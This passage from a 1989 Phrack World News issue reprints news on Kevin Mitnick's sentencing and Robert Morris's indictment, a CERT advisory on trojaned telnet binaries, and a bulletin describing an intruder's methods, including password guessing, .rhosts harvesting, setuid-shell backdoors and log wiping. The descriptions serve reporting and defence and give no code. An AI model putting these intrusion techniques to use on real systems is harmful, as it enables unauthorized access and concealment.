  2887. The idea that a computer "junkie" who cannot control his urge to
  2888. break into computers could be helped with a program similar to
  2889. Alcoholics Anonymous is a new one, Harriet Rossetto, director of
  2890. the treatment program, told the judge.
  2891.  
  2892. "His behavior is an impulse disorder," Rossetto said.  "The
  2893. disease is the addiction, whether it be drugs, alcohol, gambling,
  2894. hacking, money or power."
  2895.  
  2896. Rossetto, who was contacted by Mitnick's family, said Mitnick
  2897. would be the first person addicted to computer crime to be
  2898. treated in the Bet T'shuvah program , a 20-bed residential
  2899. treatment program for Jewish criminal offenders.
  2900.  
  2901. "It's not willful conduct, what Kevin does," she said.  "He's
  2902. tried to control his behavior but hacking gives him a sense of
  2903. power, makes him feel like somebody when he's depressed or he's
  2904. lost a job."
  2905.  
  2906. Mitnick, age 25, has been in federal prison for seven months
  2907. since his arrest
  2908. last December on computer fraud charges.
  2909.  
  2910. He pleaded guilty in May to possessing 16 unauthorized MCI
  2911. long-distance codes and to stealing a computer security program
  2912. from the Digital Equipment Corporation in Massachusetts.
  2913.  
  2914. Mitnick has been described in court as a computer whiz who could
  2915. break into secured systems and change telephone or school records
  2916. at will.  He told the judge on Monday, July 17 that he wants to
  2917. stop hacking.
  2918.  
  2919. "I sincerely want to change my life around and be productive
  2920. rather than destructive," Mitnick said.
  2921.  
  2922. "With counseling to break the addictive pattern I feel I have
  2923. towards computer hacking, I can take an active role and I don't
  2924. have to have the compulsive behavior again."
  2925.  
  2926. Assistant U.S. Attorney James R. Asperger said that the
  2927. government does not oppose Mitnick's release from prison to be
  2928. treated at Bet T'shuvah.
  2929.  
  2930. "The judge has taken this case very seriously.  It shows computer
  2931. hacking is not like a Nintendo game," Asperger said.
  2932.  
  2933. Mitnick has cooperated with FBI investigators since his pleaded
  2934. guilty and helped bring charges against his former best friend,
  2935. Leonard DiCicco, 23, of Calabasas, Asperger said.
  2936.  
  2937. DiCicco, who initially tipped the FBI to Mitnick's crimes, has
  2938. agreed to plead guilty to a charge of aiding and abetting the
  2939. transportation of a stolen computer program.
  2940.  
  2941. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2942.  
  2943. Authorities Backed Away From Original Allegations
  2944. July 23, 1989
  2945. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2946. by Karen E. Klein (New York Times)
  2947.  
  2948. LOS ANGELES -- Shortly after computer hacker Kevin Mitnick was
  2949. arrested last December (1988), he was characterized as an extreme
  2950. threat who could wreak electronic chaos if he got near so much as
  2951. a telephone without supervision.
  2952.  
  2953. Police and FBI agents started trying to corroborate the flurry of
  2954. rumors that arose about the malicious actions of the computer
  2955. whiz from suburban Panorama City, whose case attracted national
  2956. attention.
  2957.  
  2958. Three judges denied Mitnick, age 25, bail on the ground that he
  2959. was a danger to society and ordered him held in a high-security
  2960. jail cell.
  2961.  
  2962. But after separating the Mitnick myth from the reality,
  2963. authorities backed away from many of their original allegations.
  2964.  
  2965. "A lot of the stories we originally heard just didn't pan out, so
  2966. we had to give him the benefit of the doubt," said James R.
  2967. Asperger, the assistant U.S. attorney who handled Mitnick's case.
  2968.  
  2969. Mitnick, pudgy and nervous, appeared in court last week to
  2970. apologize for his crimes and to ask for treatment to help break
  2971. his compulsive "addiction" to computers.
  2972.  
  2973. U.S. District Judge Mariana R. Pfaelzer sentenced him to serve
  2974. one year in
  2975. prison -- including the nearly eight months he already has served
  2976. -- and then to undergo six months of counseling and treatment
  2977. similar to that given to alcoholics or drug addicts.
  2978.  
  2979. "I think he has problems that would benefit greatly from this
  2980. kind of therapy," Pfaelzer said.  "I want him to spend as much
  2981. time as possible in counseling."
  2982.  
  2983. The case that began with a bang ended with Asperger pointing out
  2984. that the one-year prison term is the stiffest sentence ever
  2985. handed out in a computer fraud case.
  2986.  
  2987. Mitnick originally was accused of using unauthorized MCI
  2988. long-distance codes to tap into Leeds University computers in
  2989. England and of stealing a $4 million computer security system
  2990. from the Digital Equipment Corporation in Massachusetts.
  2991.  
  2992. He ultimately agreed to plead guilty to possessing 16
  2993. unauthorized MCI long-distance codes and to stealing the computer
  2994. security program.  The other charges were dismissed.
  2995.  
  2996. Alan Rubin, Mitnick's lawyer, said he felt vindicated by the
  2997. outcome of the case.
  2998.  
  2999. Rubin contended from the start that computerphobia and adolescent
  3000. exaggeration led authorities to mistakenly brand Mitnick a
  3001. malicious criminal.
  3002.  
  3003. "Once the snowball starts rolling, you can't stop it," said
  3004. Rubin, who waged an unsuccessful campaign up to the federal
  3005. appeals court to get bail for his client.
  3006.  
  3007. Far from being serious, Rubin said, Mitnick's actions were mostly
  3008. immature, adolescent pranks.
  3009.  
  3010. He pointed to evidence that Mitnick was able to electronically
  3011. cut off telephone service to people he was angry with and once
  3012. sent an enemy a $30,000 hospital telephone bill.
  3013.  
  3014. "It was the computer equivalent of sending your friend 14
  3015. pizzas," he said.
  3016.  
  3017. Many of the legends surrounding Mitnick came from the subculture
  3018. of computer hackers -- and specifically from a man who was once
  3019. Mitnick's best friend, Leonard Mitchell DiCicco, age 23, of
  3020. Calabasas, California.
  3021.  
  3022. DiCicco, who had a falling out with Mitnick over a $100 bet, told
  3023. computer security specialists at the Digital Equipment
  3024. Corporation that Mitnick had been trespassing on their system.
  3025.  
  3026. They in turn contacted the FBI agents, who arrested Mitnick.
  3027.  
  3028. What DiCicco told investigators may or may not have been entirely
  3029. truthful, Rubin said.
  3030.  
  3031. "I have no idea what his motives were," Rubin said.
  3032.  
  3033. But DiCicco, who alerted authorities to Mitnick's crime, had the
  3034. tables turned on him after the government refused to grant him
  3035. absolute immunity for his testimony against Mitnick.
  3036.  
  3037. When the prosecution said they might charge him with a crime,
  3038. DiCicco clammed up and refused to cooperate any further.  But
  3039. from his prison cell, Mitnick agreed to cooperate and provided
  3040. enough incriminating evidence for the government to charge
  3041. DiCicco.
  3042.  
  3043. DiCicco is expected to plead guilty to a charge of aiding and
  3044. abetting the interstate transportation of stolen property -- the
  3045. computer security program -- on Monday.
  3046.  
  3047. Asperger said he was not sure whether DiCicco would get a
  3048. sentence similar to Mitnick's.
  3049.  
  3050. "Although they were friends and partners in computer hacking,
  3051. (DiCicco) appeared to play a subordinate role (in the crime),"
  3052. Asperger said.
  3053.  
  3054. Other rumors about Mitnick's conduct came from fellow hackers,
  3055. who may have blown the stories out of proportion.
  3056.  
  3057. "It's a very strange sub-culture, with a lot of jealousies,"
  3058. Rubin said.  "Part of it is bragging about how macho you are and
  3059. what systems you've broken into.  It's very immature in a lot of
  3060. ways."
  3061.  
  3062. But prosecutors, citing Mitnick's various scrapes with computer
  3063. misconduct since he was 13, aren't willing to let him off the
  3064. hook entirely.
  3065.  
  3066. "I think there's some substance to these things (the rumors that
  3067. arose in Mitnick's case), an awful lot of them," said Los Angeles
  3068. FBI chief Lawrence Lawler, who is a computer buff himself and
  3069. followed Mitnick's case closely.
  3070.  
  3071. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3072.  
  3073. If you are looking for other articles about Kevin David Mitnick aka Condor
  3074. please refer to;
  3075.  
  3076. "Pacific Bell Means Business"                     (10/06/88) PWN XXI. . .Part 1
  3077. "Dangerous Hacker Is Captured"                    (No Date ) PWN XXII . .Part 1
  3078. "Ex-Computer Whiz Kid Held On New Fraud Counts"   (12/16/88) PWN XXII . .Part 1
  3079. "Dangerous Keyboard Artist"                       (12/20/88) PWN XXII . .Part 1
  3080. "Armed With A Keyboard And Considered Dangerous"  (12/28/88) PWN XXIII. .Part 1
  3081. "Dark Side Hacker Seen As Electronic Terrorist"   (01/08/89) PWN XXIII. .Part 1
  3082. "Mitnick Plea Bargains"                           (03/16/89) PWN XXV. . .Part 1
  3083. "Mitnick Plea Bargain Rejected As Too Lenient"    (04/25/89) PWN XXVII. .Part 1
  3084. "Computer Hacker Working On Another Plea Bargain" (05/06/89) PWN XXVII. .Part 1
  3085. "Mitnick Update"                                  (05/10/89) PWN XXVII. .Part 1
  3086. "Kenneth Siani Speaks Out About Kevin Mitnick"    (05/23/89) PWN XXVII. .Part 1
  3087. _______________________________________________________________________________
  3088.  
  3089. BITNET/CSNET Announce Merger and Formation of CREN              August 18, 1989
  3090. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Washington, DC
  3091. -- Two of the nation's leading academic and research computer
  3092. networks announced today that final steps are being taken to
  3093. merge their organizations.
  3094.  
  3095. Ira Fuchs, President of BITNET, and Bernard Galler, Chairman of
  3096. CSNET, jointly reported that the two networks, which together
  3097. include 600 colleges, universities, government agencies, and
  3098. private sector research organizations, will unite to form the
  3099. Corporation for Research and Educational Networking, CREN.
  3100.  
  3101. Galler, a Professor of Electrical Engineering and Computer
  3102. Science at the University of Michigan, commented:  "The aims of
  3103. CSNET and BITNET -- to support and promote the use of computer
  3104. networks on campuses and within research organizations -- have
  3105. converged over the last several years.  We believe that by
  3106. bringing these two networks into a single organization, we will
  3107. be able to provide better service to our network users and more
  3108. effectively participate in the fast-changing national network
  3109. environment."
  3110.  
  3111. Fuchs, Vice President for Computing and Information Technology at
  3112. Princeton University, sees the move as a strengthening factor:
  3113. "The need for campus networks and the introduction of new
  3114. technology make it necessary to build a common base of network
  3115. services using the most progressive technology available.  By
  3116. eliminating overlap between our two organizations, we will
  3117. become more efficient, and more importantly, we can take a
  3118. stronger role in the the formation of the national education and
  3119. research network.  We can achieve this goal faster and at lower
  3120. cost by leveraging the efforts of the two major academic
  3121. networking organizations."
  3122.  
  3123. The merger of CSNET and BITNET has been studied for more than a
  3124. year by a planning group consisting of representatives from both
  3125. networks.  CSNET currently lists 145 institutional and corporate
  3126. members, and BITNET 480 members.  Together, the two networks
  3127. cover all 50 states and 32 foreign countries, including Japan,
  3128. Brazil, Mexico, and Argentina.  Both maintain gateways to EARN
  3129. (European Academic Research Network), NetNorth (Canada), and the
  3130. National Internet.
  3131.  
  3132. The planning group's recommendations to merge were approved by
  3133. the BITNET, Inc.  Trustees and the Directors of the University
  3134. Corporation for Atmospheric Research, operators of CSNET for the
  3135. last five years.  An information packet on the merger is being
  3136. mailed to all members of both networks this week, with a ballot
  3137. for BITNET members, who must approve the final legal steps under
  3138. the provisions of BITNET By-Laws.  In an advisory vote last
  3139. winter, BITNET members approved the merger in principle by more
  3140. than 90% of those voting.
  3141.  
  3142. A gradual transition period is planned to bring together CSNET
  3143. and BITNET services.  CREN plans to continue use of EDUCOM and
  3144. Bolt, Beranek and Newman (BBN) to provide technical and general
  3145. management services to its members.
  3146.  
  3147. EDUCOM President Kenneth M. King commented, "We are entering a
  3148. particularly challenging period in the creation of an advanced
  3149. national network infrastructure for research and education.  CREN
  3150. will play a major role in the future of these computer networks,
  3151. which are becoming more and more important to the conduct of
  3152. research and the quality of education.  EDUCOM is pleased to have
  3153. an opportunity to support the services and activities of CREN. "
  3154.  
  3155. Frank Heart, Senior Vice President, BBN Systems and Technologies
  3156. Corporation, said, "In keeping with its long involvement in the
  3157. development of networking technologies, BBN is pleased to play a
  3158. major supporting role in the evolution of BITNET and CSNET."
  3159.  
  3160. The proposed CREN Board includes Fuchs and Galler;
  3161.  
  3162. Douglas Bigelow. . . . . Wesleyan University
  3163. William Curtis . . . . . University Corporation for Atmospheric Research
  3164. David Farber . . . . . . University of Pennsylvania
  3165. Suzanne Johnson. . . . . INTEL Corporation
  3166. Mark Laubach . . . . . . Hewlett-Packard Corporation
  3167. Philip Long. . . . . . . Yale University
  3168. Dennis Ritchie . . . . . AT&T Bell Laboratories
  3169. Martin Solomon . . . . . University of South Carolina
  3170. Douglas Van Houweling. . University of Michigan
  3171. William Yundt. . . . . . Stanford University
  3172.  
  3173. For more information, contact
  3174.  
  3175.               Corporation for Research and Educational Networking
  3176.                                    Suite 600
  3177.                               1112 16th Street NW
  3178.                              Washington, DC  20036
  3179.  
  3180.                                 (202) 872-4215
  3181.  
  3182.               [Obviously they decided not to call it ONEnet --KL]
  3183. _______________________________________________________________________________
  3184.  
  3185. CERT Internet Security Advisory                                 August 16, 1989
  3186. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3187. >From Kenneth R. van Wyk
  3188.  
  3189. Many computers connected to the Internet have recently
  3190. experienced unauthorized system activity.  Investigation shows
  3191. that the activity has occurred for several months and is
  3192. spreading.  Several UNIX computers have had their "telnet"
  3193. programs illicitly replaced with versions of "telnet" which log
  3194. outgoing login sessions (including usernames and passwords to
  3195. remote systems).  It appears that access has been gained to many
  3196. of the machines which have appeared in some of these session
  3197. logs.  (As a first step, frequent telnet users should change
  3198. their passwords immediately.)  While there is no cause for panic,
  3199. there are a number of things that system administrators can do to
  3200. detect whether the security on their machines has been
  3201. compromised using this approach and to tighten security on their
  3202. systems where necessary.  At a minimum, all UNIX site
  3203. administrators should do the following:
  3204.  
  3205. o Test telnet for unauthorized changes by using the UNIX
  3206.   "strings" command to search for path/filenames of possible log
  3207.   files.  Affected sites have noticed that their telnet programs
  3208.   were logging information in user accounts under directory names
  3209.   such as "..." and ".mail".
  3210.  
  3211. In general, we suggest that site administrators be attentive to
  3212. configuration management issues.  These include the following:
  3213.  
  3214.  
  3215. o Test authenticity of critical programs - Any program with
  3216.   access to the network (e.g., the TCP/IP suite) or with access
  3217.   to usernames and passwords should be periodically tested for
  3218.   unauthorized changes.  Such a test can be done by comparing
  3219.   checksums of on-line copies of these programs to checksums of
  3220.   original copies.  (Checksums can be calculated with the UNIX
  3221.   "sum" command.)  Alternatively, these programs can be
  3222.   periodically reloaded from original tapes.
  3223.  
  3224. o Privileged programs - Programs that grant privileges to users
  3225.   (e.g., setuid root programs/shells in UNIX) can be exploited to
  3226.   gain unrestricted access to systems.  System administrators
  3227.   should watch for such programs being placed in places such as
  3228.   /tmp and /usr/tmp (on UNIX systems).  A common malicious
  3229.   practice is to place a setuid shell (sh or csh) in the /tmp
  3230.   directory, thus creating a "back door" whereby any user can
  3231.   gain privileged system access.
  3232.  
  3233. o Monitor system logs - System access logs should be periodically
  3234.   scanned (e.g., via UNIX "last" command) for suspicious or
  3235.   unlikely system activity.
  3236.  
  3237. o Terminal servers - Terminal servers with unrestricted network
  3238.   access (that is, terminal servers which allow users to connect
  3239.   to and from any system on the Internet) are frequently used to
  3240.   camouflage network connections, making it difficult to track
  3241.   unauthorized activity.  Most popular terminal servers can be
  3242.   configured to restrict network access to and from local hosts.
  3243.  
  3244. o Passwords - Guest accounts and accounts with trivial passwords
  3245.   (e.g., username=password, password=none) are common targets.
  3246.   System administrators should make sure that all accounts are
  3247.   password protected and encourage users to use acceptable
  3248.   passwords as well as to change their passwords periodically, as
  3249.   a general practice.  For more information on passwords, see
  3250.   Federal Information Processing Standard Publication (FIPS PUB)
  3251.   112, available from the National Technical Information Service,
  3252.   U.S. Department of Commerce, Springfield, VA 22161.
  3253.  
  3254. o Anonymous file transfer - Unrestricted file transfer access to
  3255.   a system can be exploited to obtain sensitive files such as the
  3256.   UNIX /etc/passwd file.  If used, TFTP (Trivial File Transfer
  3257.   Protocol - which requires no username/password authentication)
  3258.   should always be configured to run as a non-privileged user and
  3259.   "chroot" to a file structure where the remote user cannot
  3260.   transfer the system /etc/passwd file.  Anonymous FTP, too,
  3261.   should not allow the remote user to access this file, or any
  3262.   other critical system file.  Configuring these facilities to
  3263.   "chroot" limits file access to a localized directory structure.
  3264.  
  3265. o Apply fixes - Many of the old "holes" in UNIX have been closed.
  3266.   Check with your vendor and install all of the latest fixes.
  3267.  
  3268. If system administrators do discover any unauthorized system
  3269. activity, they are urged to contact the Computer Emergency
  3270. Response Team (CERT).
  3271.  
  3272. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3273. - - - - - - -
  3274.  
  3275. Internet Cracker On The Loose:  Who Is He?
  3276. October 2, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There
  3277. is a cracker on the loose in the Internet.  This is the
  3278. information made public so far.  Traces of the cracker were found
  3279. at the Institute for Advanced Studies in Princeton.  He also left
  3280. traces at one of the Super computer centers.  Both CERT and the
  3281. FBI have been called.
  3282.  
  3283. The technique that is being used is as follows:
  3284.  
  3285. 1) He has a modified telnet that tries a list passwords on
  3286.    accounts.  Username forwards and backwards, username + pw,
  3287.    etc.
  3288.  
  3289. 2) He seems to have a program call "ret", that is breaking into
  3290. root.
  3291.  
  3292. 3) He seems to be getting a list of victim machines via people's
  3293. .rhosts files.
  3294.  
  3295. 4) He copies password files to the machines that he is currently
  3296. working from.
  3297.  
  3298. 5) He is good about cleaning up after himself.  He zeros out log
  3299.    files and other traces of himself.
  3300.  
  3301. 6) The breakins are occurring between 10 PM Sunday nights and 8
  3302.    AM Monday mornings.
  3303.  
  3304. 7) He seems to bring along a text file of security holes to the
  3305.    machines he breaks into.
  3306.  
  3307. 8) Backtracing the network connections seem to point to the
  3308.    Boston area as a base of operations.
  3309.  
  3310. The system administrator at IAS found a directory with the name
  3311. "..  " (dot dot space space).  The files mentioned above were
  3312. found in this directory.
  3313. _______________________________________________________________________________
  3314.  
  3315. Worried Firms Pay Hush Money To "Hackers"                         June 12, 1989
  3316. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3317. By Richard Caseby (London Times)
  3318.  
  3319.             "Are London Firms Offering Amnesty To Hacker Thieves?"
  3320.  
  3321. Firms in the City of London are buying the silence of hackers who
  3322. break into their computers and steal millions of pounds.
  3323.  
  3324. At least six London firms have signed agreements with criminals,
  3325. offering them amnesty if they return part of the money.  The
  3326. firms fear that if they prosecute they will lose business when
  3327. customers learn that their computer security is flawed.
  3328.  
  3329. In several of the case the losses exceeded 1 million pounds, but
  3330. only a tenth of the total was returned.
  3331.  
  3332. The Computer Industry Research Unit (CIRU) which uncovered the deals and which
  3333. is advising the Department of Trade and Industry in data security, believes the
  3334. practice of offering amnesties is widespread.
  3335.  
  3336. "Companies who feel vulnerable are running scared by agreeing to these immoral
  3337. deals.  Their selfishness is storing up serious problems for everyone else,"
  3338. said Peter Nancarrow, a senior consultant.
  3339.  
  3340. Police have warned that deals struck with criminals could
  3341. possibly lead to an employer being prosecuted for perverting the
  3342. course of justice.
  3343.  
  3344. Detective Inspector John Austin, of Scotland Yard's computer
  3345. fraud squad, said, "Employers could find themselves in very deep
  3346. water by such strenuous efforts to protect the credibility of
  3347. their image."
  3348.  
  3349. Legal experts say the firms are making use of section five of the
  3350. Criminal Law Act 1967 which allows them to keep silent on crimes
  3351. and privately agree on compensation.  However, an employer
  3352. becomes a witness to the offense by taking evidence from a
  3353. criminal when the deal is drawn up.
  3354.  
  3355. Hackers steal by electronically transferring funds or by
  3356. programming a computer to round off all transactions by a tiny
  3357. amount and diverting the money to a separate account.
  3358.  
  3359. In one case, an assistant programmer at a merchant bank diverted
  3360. 8 million pounds to a Swiss bank account and then gave back 7
  3361. million in return for a non-disclosure agreement protecting him
  3362. against prosecution.
  3363.  
  3364. Such thefts have spread alarm throughout London, with consultants
  3365. offering to penetrate the computer networks of banks and finance
  3366. houses to pinpoint loopholes before a hacker does.
  3367.  
  3368. The biggest contracts cost up to 50,000 pounds and can involve a
  3369. four month investigation in which every weakness is explored.
  3370.  
  3371. Detectives have found that computer security at many London
  3372. institutions is riddled with loopholes.  A city of London police
  3373. operation, codenamed Comcheck, revealed wide spread weaknesses.
  3374. Firms were asked to track the number of unauthorized logons over
  3375. Easter bank holiday.
  3376.  
  3377. Some companies unable to tell whether hackers had penetrated
  3378. their network, while others lacked any security defenses.
  3379.  
  3380. In addition to theft, companies are vulnerable to blackmail.
  3381. Hackers can threaten to sabotage computers by inserting "viruses"
  3382. and "logic bombs" --rogue programs which can paralyze a system.
  3383.  
  3384. This type of threat has prompted the offer of a new insurance
  3385. policy underwritten by Lloyd's which specifically covers viruses
  3386. and other computer catastrophes.
  3387. ______________________________________________________________________
  3388.  
  3389.                                 ==Phrack Inc.==
  3390.  
  3391.                     Volume Three, Issue 28, File #10 of 12
  3392.  
  3393.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3394.             PWN                                                 PWN
  3395.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3396.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3397.             PWN               Issue XXVIII/Part 2               PWN
  3398.             PWN                                                 PWN
  3399.             PWN                 October 7, 1989                 PWN
  3400.             PWN                                                 PWN
  3401.             PWN          Created, Written, and Edited           PWN
  3402.             PWN               by Knight Lightning               PWN
  3403.             PWN                                                 PWN
  3404.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3405.  
  3406.  
  3407. Grand Jury Indicts Student For Crippling Nationwide Computer Network    7/26/89
  3408. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3409. by John Markoff (New York Times)
  3410.  
  3411. After more than eight months of delay, the Justice Department said Wednesday
  3412. that a federal grand jury in Syracuse, N.Y., had indicted the 24-year-old
  3413. Cornell University graduate student who has been blamed for crippling a
  3414. nationwide computer network with a rogue software program.
  3415.  
  3416. The student, Robert Tappan Morris, was charged with a single felony count under
  3417. a 1986 computer crimes law, the Computer Fraud and Abuse Act.  Justice
  3418. Department officials said the indictment was the first under a provision of the
  3419. law that makes it illegal to gain unauthorized access to federal computers.
  3420.  
  3421. A spokesman for the Justice Department said Wednesday that the indictment had
  3422. been delayed simply because of the time taken to develop evidence.
  3423.  
  3424. But legal experts familiar with the case said the department had been stalled
  3425. in efforts to prosecute Morris because of an internal debate over whether it
  3426. might be impossible to prove the charges.  Under the 1986 law, prosecutors must
  3427. show that Morris intended to cripple the computer network.
  3428.  
  3429. As a result of this concern, the U.S. attorney in Syracuse, Frederick J.
  3430. Scullin Jr., had considered a plea bargain in which Morris would have pleaded
  3431. guilty to a misdemeanor charge.  This approach was apparently resisted,
  3432. however, by Scullin's superiors in Washington, who wanted to send a clear
  3433. signal about the seriousness of computer crime.
  3434.  
  3435. Three bills now pending before Congress would make it easier than with the 1986
  3436. law to prosecute malicious invasion of computer systems.
  3437.  
  3438. The indictment charges that Morris was the author of a computer program that
  3439. swept through a national network composed of more than 60,000 computers
  3440. November 2, 1988 jamming as many as 6,000 machines at universities, research
  3441. centers and military installations.
  3442.  
  3443. The software, which computer hackers call a "virus," was supposed to hide
  3444. silently in the computer network, two of Morris' college friends said, but
  3445. because of a programming error it multiplied wildly out of control.  The
  3446. friends said Morris' idea had been to simply to prove that he could bypass the
  3447. security protection of the network.
  3448.  
  3449. According to Wednesday's indictment, Morris gained unauthorized access to
  3450. computers at the National Aeronautics and Space Administration's Ames Research
  3451. Center in Moffett Field, California; the U.S. Air Force Logistics Command at
  3452. Wright Patterson Air Force Base in Dayton, Ohio; the University of California
  3453. at Berkeley, and Purdue University.
  3454.  
  3455. The indictment charges that the program shut down numerous computers and
  3456. prevented their use.  It charges Morris with causing "substantial damage" at
  3457. many computer centers resulting from the loss of service and the expense
  3458. incurred diagnosing the program.
  3459.  
  3460. The felony count carries a maximum penalty of five years in prison and a fine
  3461. of $250,000, in addition to which the convicted person can be ordered to pay
  3462. restitution to those affected by his program.
  3463.  
  3464. Morris' lawyer, Thomas A. Guidoboni, said his client intended to plead not
  3465. guilty.  Morris, who now lives in the Boston area, was scheduled to be
  3466. arraigned on Wednesday, August 2, before Gustave J. DiBianco, a U.S. magistrate
  3467. in Syracuse.
  3468.  
  3469. Morris' father, Robert, the chief scientist for the National Security Agency,
  3470. said the family planned to stand behind their son.  "We're distressed to hear
  3471. of the indictment," he said.
  3472.  
  3473. After realizing that his program had run amok, Morris went to his family home
  3474. in Arnold, Maryland, and later met with Justice Department officials.
  3475.  
  3476. The 1986 law was the first broad federal attempt to address the problem of
  3477. computer crime.  Morris is charged with gaining unauthorized access to
  3478. computers, preventing authorized access by others and causing more than $1,000
  3479. in damage.
  3480.  
  3481. The incident raised fundamental questions about the security of the nation's
  3482. computers and renewed debate over the who should be responsible for protecting
  3483. the nation's non-military computer systems.
  3484.  
  3485. Last year Congress settled a debate between the National Security Agency and
  3486. the National Institute of Standards and Technology by giving authority over
  3487. non-military systems to the civilian agency.
  3488.  
  3489. Last week, however, a General Accounting Office report based on an
  3490. investigation of the incident recommended that the Office of Science and
  3491. Technology Policy coordinate the establishment of an interagency group to
  3492. address computer network security.
  3493.  
  3494. The incident has also bitterly divided computer scientists and computer
  3495. security experts around the country.  Some have said they believe that "an
  3496. example" should be made of Morris to discourage future tampering with computer
  3497. networks.
  3498.  
  3499. Others, however, have argued that Morris performed a valuable service by
  3500. alerting the nation to the laxity of computer security controls.
  3501.  
  3502. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3503.  
  3504. Other articles about Robert Tappan Morris, Jr. and the Internet Worm are;
  3505.  
  3506. "Computer Network Disrupted By 'Virus'"          (11/03/88) PWN XXII  -Part 2
  3507. "Virus Attack"                                   (11/06/88) PWN XXII  -Part 2
  3508. "The Computer Jam:  How It Came About"           (11/08/88) PWN XXII  -Part 2
  3509. "US Is Moving To Restrict {...} Virus"           (11/11/88) PWN XXII  -Part 2 *
  3510. "FBI Studies Possible Charges In Virus"          (11/12/88) PWN XXII  -Part 2
  3511. "Big Guns Take Aim At Virus"                     (11/21/88) PWN XXII  -Part 3
  3512. "Congressman Plan Hearings On Virus"             (11/27/88) PWN XXII  -Part 3
  3513. "Pentagon Severs Military {...} Virus"           (11/30/88) PWN XXII  -Part 3 *
  3514. "Networks Of Computers At Risk From Invaders"    (12/03/88) PWN XXII  -Part 4 *
  3515. "Computer Virus Eradication Act of 1988"         (12/05/88) PWN XXII  -Part 4 *
  3516. "Breaking Into Computers {...}, Pure and Simple" (12/04/88) PWN XXIV  -Part 1 *
  3517. "Cornell Panel Concludes Morris {...} Virus"     (04/06/89) PWN XXVI  -Part 1
  3518. "Robert T. Morris Suspended From Cornell"        (05/25/89) PWN XXVII -Part 2
  3519. "Justice Department Wary In Computer Case"       (05/28/89) PWN XXVII -Part 2
  3520.  
  3521. * - Indicates that the article was not directly related to Robert Morris, but
  3522.     did discuss him as well as the Internet Worm incident.
  3523. _______________________________________________________________________________
  3524.  
  3525. The Free World Incident                                            July 5, 1989
  3526. ~~~~~~~~~~~~~~~~~~~~~~~
  3527. Special Thanks to Brew Associates of Phortune 500
  3528.  
  3529.                [Some articles edited for this presentation --KL]
  3530.  
  3531. Numb: 84 of 98                7/2/89 at 8:56 pm
  3532. Subj: ...
  3533. Sect: General Messages
  3534. From: Major Havoc
  3535.  
  3536. Here is the story...
  3537.  
  3538. Evidently, someone got into Chesapeake & Potomac's (C&P) computer systems, and
  3539. added call forwarding to the telephone line that the Free World is being run
  3540. on.  It was not done through social engineering, because there was not an order
  3541. pending on my line.  Therefore, I had "free" call waiting on my line.
  3542.  
  3543. What the individual who did this does not realize is that service cannot be
  3544. changed on my line unless it is typical service, because because my father is a
  3545. retired VP from C&P.
  3546.  
  3547. The phone lines at this location are paid for by C&P, so the only way that the
  3548. service on these lines could have been changed is directly via the C&P computer
  3549. systems.  I had a long talk with C&P security, and they know who the individual
  3550. was that made the changes in the system.  My parents (since I do not even
  3551. really live here anymore) are supposed to be signing papers that will have this
  3552. individual prosecuted sometime next week, because he was foolish enough to
  3553. leave something for them to track down.
  3554.  
  3555. My guess is that it was someone who was denied access to the system that has
  3556. some type of grudge to hold or something.  I will have the pleasure of seeing
  3557. this individual serve time, if they are not a minor.
  3558.  
  3559. C&P Security questioned me in person and asked me if I had any information on
  3560. different incidents concerning central office burglaries or theft of C&P
  3561. property.  Some of you may be getting a BIG surprise REAL soon.
  3562.  
  3563. The bottom line is that I am not going to put up with this hassle much longer.
  3564. The mere fact that I am under possible investigation for something that I am
  3565. not involved with is really starting to get me upset.  I am 20 years old, and I
  3566. have a nice 32K salary job, and I am not going to tolerate these situations any
  3567. longer.  I have been doing this for so long, that it is about time that I got
  3568. some kind of recognition, and not more grief from a bunch of worthless
  3569. Christmas modemers.
  3570.  
  3571. Shape up or pay the consequences.
  3572.  
  3573.                                                                 -Major Havoc
  3574.  
  3575. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3576.  
  3577. Numb: 86 of 98                7/2/89 at 11:54 pm
  3578. Subj: Hmm..
  3579. Sect: General Messages
  3580. From: Weatherman
  3581.  
  3582. I would do the same thing.  If some guy thinks he is being really slick and
  3583. does something like that just to cause trouble, they deserve a rude awakening
  3584. to real life.  Keep us posted on the situation.  I can see your point as to
  3585. your job and age and everything since I am in the same boat.  I am not going to
  3586. sacrifice my future life for any reason.  Unfortunately, I don't make 32k yet.
  3587.  
  3588.                                                         \%\%eatherman
  3589.  
  3590. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3591.  
  3592. Numb: 87 of 98                7/3/89 at 12:07 pm
  3593. Subj: Umm...
  3594. Sect: General Messages
  3595. From: Lost Carrier
  3596.  
  3597. Major Havoc -- The only part of your message I am concerned about is "I had a
  3598. long talk with C&P security and a lot of you will be in for a big surpirse," or
  3599. something to that effect.  I hate surprises.  Which of us?     heh.
  3600.  
  3601.                                                                 LC, 2af
  3602.  
  3603. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3604.  
  3605. Numb: 89 of 98                7/3/89 at 4:03 pm
  3606. Subj: ....
  3607. Sect: General Messages
  3608. From: Raving Lunatic
  3609.  
  3610. I am shocked.  Major Havoc turning people in?  About time, I guess it takes
  3611. income and responsibilities for most geeks to grow up and I am glad Havoc is not
  3612. going to tolerate it.  Would be interesting to at least hear the alias(es) of
  3613. the people/person that did the forwarding.
  3614.  
